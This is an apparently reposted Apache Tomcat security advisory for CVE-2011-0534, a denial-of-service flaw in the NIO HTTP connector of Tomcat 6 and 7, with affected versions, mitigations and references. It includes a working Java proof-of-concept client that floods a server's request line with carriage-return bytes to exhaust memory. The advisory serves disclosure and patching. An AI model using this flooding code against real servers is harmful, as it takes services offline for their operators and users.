Apache Tomcat DoS Vulnerability

2011.02.14
Credit: Tomcat security team
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2011-0534
CWE: CWE-399


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2011-0534 Apache Tomcat DoS vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.6 - - Tomcat 6.0.0 to 6.0.30 Description: Tomcat did not enforce the maxHttpHeaderSize limit while parsing the request line in the NIO HTTP connector. A specially crafted request could trigger an DoS via an OutOfMemoryError. Example (AL2 licensed): package bug50631; import java.io.OutputStream; import java.net.InetSocketAddress; import java.net.Socket; import java.net.SocketAddress; public class FloodClient1 { static final int k_step = 10; static byte[] value = new byte[k_step * 1024]; public static void main(String[] args) throws Exception { int i = 0; while (i < value.length) { value[i++] = 13; } SocketAddress addr = new InetSocketAddress("localhost", 8080); Socket socket = new Socket(); socket.setSoTimeout(0); socket.connect(addr, 0); OutputStream os = socket.getOutputStream(); // InputStream is = socket.getInputStream(); int k = k_step; int m = 0; int k100 = 100; while (m < 2000) { if (k >= k100) { k100 += 100; System.out.print('.'); System.out.flush(); } if (k >= 1024) { m++; k -= 1024; k100 = 100; System.out.println(" " + m + " Mb"); } os.write(value); os.flush(); Thread.sleep(1); k+=k_step; } } } Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to a Tomcat version where this issue is fixed - - Use a BIO or AJP HTTP connector in place of an NIO HTTP connector Credit: The issue was identified by the Tomcat security team. References: https://issues.apache.org/bugzilla/show_bug.cgi?id=50631 http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJNTLBxAAoJEBDAHFovYFnnVFsQAIE5bU+2aJccXjnlYkEZAr4S aXmHOCqTOzaW5ob3hPhpFmOwZx3Miabx9fJPRGnCb8CEihz00soYbMcTRHbgDqXA d/bXMr4xjZF80AM/cWng0vmDbgnLbhVUkGwNqLtuU2rjyxfnRNKBkc0CDIoDQ1FV zkm5uW9DYTpCmcRo13IhCPanY1DRA/+QiUxriofeUPuz6skiUuyBiY95GDQNOvSo GofEJt39DBnPDb2kzonkQTERo2OgSIPDgLeas3/pawHGsQXaBH3dwOsRQESExJS+ kT5xuhUuqynWNGXnimG0x8yCDe7+SujiAmSjTSrblBIanOtIt3SxjSe9+SasSQih jNO/M87aQ/znmlIlVeS4F+OFuWSuBUB+GjpZn1L77pG+/yWiHurhUuAXM2borB9c I45c2yuYstki7ej9buHXpy5l4d6A28FT61V6E2sENM9RMMHFY7cUJmorbsBf1qj2 ei+h9QEcNiwg/on0apg9pU+B1PCZxGR7G/8aMCXFfkri4opeAXy7ZpJfk+k2zI64 S8edezROjZxgztqZKydpFn2MrQ9tUmoioZHUEiZqAuPVfszXvUdLZsSFh+7A6+4D jL+T7jIt9wsCxsZJ1+8X03nEkD7Yop+kHvUmMjyM4XEKLReI+PoXfYBrNou7Nhvm niulExg4qtuJplCbEw8k =06CU -----END PGP SIGNATURE-----

References:

http://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.32
http://xforce.iss.net/xforce/xfdb/65162
http://www.vupen.com/english/advisories/2011/0293
http://www.securitytracker.com/id?1025027
http://www.securityfocus.com/bid/46164
http://www.securityfocus.com/archive/1/archive/1/516214/100/0/threaded
http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.8_%28released_5_Feb_2011%29
http://osvdb.org/70809


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top